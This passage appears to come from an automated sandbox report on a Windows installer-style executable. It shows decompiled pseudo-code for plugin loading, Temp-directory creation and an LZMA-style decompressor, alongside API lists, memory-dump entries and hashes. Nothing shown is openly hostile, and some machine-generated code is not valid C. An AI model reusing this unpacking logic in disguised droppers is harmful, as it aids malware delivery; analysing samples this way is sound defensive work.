				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404E84(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                    0x00401f84
                                                                                                                    0x00401f84
                                                                                                                    0x00401f89
                                                                                                                    0x00401f90
                                                                                                                    0x0040204c
                                                                                                                    0x00402197
                                                                                                                    0x00402197
                                                                                                                    0x004028be
                                                                                                                    0x004028c1
                                                                                                                    0x004028cd
                                                                                                                    0x004028cd
                                                                                                                    0x00401f9f
                                                                                                                    0x00401fa9
                                                                                                                    0x00401fac
                                                                                                                    0x00401fbb
                                                                                                                    0x00401fbf
                                                                                                                    0x00401fc5
                                                                                                                    0x00401fc9
                                                                                                                    0x00402045
                                                                                                                    0x00000000
                                                                                                                    0x00402045
                                                                                                                    0x00401fcb
                                                                                                                    0x00401fd5
                                                                                                                    0x00401fd9
                                                                                                                    0x0040201d
                                                                                                                    0x00401fdb
                                                                                                                    0x00401fde
                                                                                                                    0x00401fe1
                                                                                                                    0x00402011
                                                                                                                    0x00401fe3
                                                                                                                    0x00401fe6
                                                                                                                    0x00401fef
                                                                                                                    0x00401ff1
                                                                                                                    0x00401ff1
                                                                                                                    0x00401fef
                                                                                                                    0x00401fe1
                                                                                                                    0x00402025
                                                                                                                    0x0040203a
                                                                                                                    0x0040203a
                                                                                                                    0x00000000
                                                                                                                    0x00402025
                                                                                                                    0x00401faf
                                                                                                                    0x00401fb5
                                                                                                                    0x00401fb9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                                                                                      • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                      • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                      • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                      • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                      • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                                                                                                      • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                                                                                                      • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                                                                                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                                                    • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2987980305-0
                                                                                                                    • Opcode ID: 7d6bbd44808b66ffa584f43e8c4aa3573383001e876b7905c6c28b9b395068af
                                                                                                                    • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                                                                                                    • Opcode Fuzzy Hash: 7d6bbd44808b66ffa584f43e8c4aa3573383001e876b7905c6c28b9b395068af
                                                                                                                    • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 87%
                                                                                                                    			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040571F(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056B6(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053C3(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E00405346(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                                                    0x004015b3
                                                                                                                    0x004015ba
                                                                                                                    0x004015bd
                                                                                                                    0x004015c2
                                                                                                                    0x004015c6
                                                                                                                    0x004015c8
                                                                                                                    0x004015d0
                                                                                                                    0x004015d2
                                                                                                                    0x004015d4
                                                                                                                    0x004015d8
                                                                                                                    0x004015db
                                                                                                                    0x004015f3
                                                                                                                    0x004015f4
                                                                                                                    0x004015dd
                                                                                                                    0x004015dd
                                                                                                                    0x004015e0
                                                                                                                    0x00000000
                                                                                                                    0x004015eb
                                                                                                                    0x004015ec
                                                                                                                    0x004015ec
                                                                                                                    0x004015e0
                                                                                                                    0x004015fb
                                                                                                                    0x00401602
                                                                                                                    0x0040160f
                                                                                                                    0x0040160f
                                                                                                                    0x00401604
                                                                                                                    0x00401605
                                                                                                                    0x0040160d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040160d
                                                                                                                    0x00401602
                                                                                                                    0x00401612
                                                                                                                    0x00401615
                                                                                                                    0x00401617
                                                                                                                    0x00401618
                                                                                                                    0x004015c8
                                                                                                                    0x0040161f
                                                                                                                    0x0040164a
                                                                                                                    0x00402197
                                                                                                                    0x00401621
                                                                                                                    0x00401623
                                                                                                                    0x0040162e
                                                                                                                    0x00401634
                                                                                                                    0x0040163c
                                                                                                                    0x00401642
                                                                                                                    0x00401642
                                                                                                                    0x0040163c
                                                                                                                    0x004028c1
                                                                                                                    0x004028cd

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,00421940,00000000,00405783,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                                                                                                      • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                                                                                                      • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                      • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                    • API String ID: 1892508949-1943935188
                                                                                                                    • Opcode ID: 68e7b39f27e2b00361e68aa136da5f419b93ec0988189e82b4baa53dd5dee2d9
                                                                                                                    • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                                                                                                    • Opcode Fuzzy Hash: 68e7b39f27e2b00361e68aa136da5f419b93ec0988189e82b4baa53dd5dee2d9
                                                                                                                    • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406609, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 99%
                                                                                                                    			E00406609() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
